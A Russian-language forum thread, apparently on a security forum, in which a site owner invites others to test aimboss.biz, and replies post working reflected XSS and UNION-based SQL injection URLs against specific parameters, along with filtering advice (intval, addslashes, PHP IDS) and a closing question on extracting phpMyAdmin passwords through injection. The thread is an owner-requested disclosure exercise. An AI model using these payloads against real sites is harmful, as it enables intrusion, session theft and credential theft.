![]() |
aimboss.biz
Пожалуйста проверьте мой сайт на уязвимости
если необходимо начислю кредитов и опишу возможности которых очень много и нужно всё отладить Заранее спасибо! |
Пассивная XSS
http://aimboss.biz/?nvg=/user:<script>alert()</script> http://aimboss.biz/?nvg=s-jsip:pinfo:</title></head><body><img src=.+onerror=alert()><!-- http://aimboss.biz/?nvg=t:message:"><script>alert()</script><!-- SQL-INJ http://aimboss.biz/?nvg=/user::-1+union+select+concat_ws(0x3a,user(),version()),2, 3+--+ http://aimboss.biz/?nvg=weblog:pages:1,1,4,-1'+OR+1=1+--+ http://aimboss.biz/?nvg=s-jsip:pinfo:-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), version()),8+--+ |
Пассивка:
http://aimboss.biz/?nvg=casino:rally:run"><script>alert()</script> по-моему, она там везде :) |
спасибо, буду исправлять
ЗЫ. а как сделали столько много.. в онлайне? BlackSun: хз, побочные эффекты это понятно что это только цветочки.., главное что указали на то как не стоит делать, и что надо фильтровать Get запросы BlackSun: фильровать надо всё, _GET, _POST, _COOKIE, _FILES, и тп. Все данные от пользователей. |
Продолжу в этом посте ..
SQL-INJ, http://aimboss.biz/?nvg=!site:z:usr В поле ник: Цитата:
http://aimboss.biz/?nvg=t:vfile:-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion())+--+ |
Вот еще парочка...
http://aimboss.biz/?nvg=weblog:myblogs:-211+union+select+1,2,3,4,concat_ws(char(58),user() ,database(),version()),6,7,8,9,10,11,12,13,14-- http://aimboss.biz/?nvg=weblog:<script>alert()</script> вообщем все баги идентичны |
Короче, думаю дальше уже нет смысла копать, идите на полную доработку, фильтрации нет вообще нигде. Потом уже действительно на проверку.
|
как лучше производить фильтрацию?
от JS strip_tags() а от SQL-INJ как можно обезопасится? сегодня-завтра постараюсь всё исправить и надеюсь на дельнейшую помошь в поиске уязвимостей ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне.. |
addslashes(), inval(), маны по пыху в помошь. Есстественно, если в параметре может быть только число, то лучше использовать intval(), а не addslashes.
Цитата:
|
что даст addslashes()?
думаю бесполезная функция в данном случае |
Цитата:
|
это понятно что экранирует
но надписи всё равно останутся на страничке, надо полностю исключить появления подобного эффекта, а не только экранировать выполнение инъекции ИМХО поэтому желательно полностю отфильтровать, а не просто экранировать кавычки |
поставил фильтр, прошу посмотреть ещё какие могут быть уязвимости
|
Рекомендую посмотреть в сторону PHP IDS - http://php-ids.org/ по тестам, хорошая система для зашиты скриптов.
|
BlackSun, мы вообще-то русские люди, подобного на русском нет?
ЗЫ. и что за привычка посылать как футболист футболит мяч не умеющий играть.. |
Пассивная XSS
http://aimboss.biz/?kin=1<script>alert(document.cookie)</script> |
спасибо, исправил :)
|
кто нибудь ещё что нибудь может найти?
сайт очень большой, дыр наверняка ещё очень много |
почему тишина? разве нет больше уязвимостей?
скажите свои ники я вам начислю кредитов и вы посмотрите как работает биржа, форум, панель заказов и др. не хочется когда начнём запускать проект снова узнавать что есть баги.. |
в соседней теме увидел
Цитата:
возник вопрос какими командами можно через инекцию узнать пароли от phpmyadmin? |
| Время: 09:34 |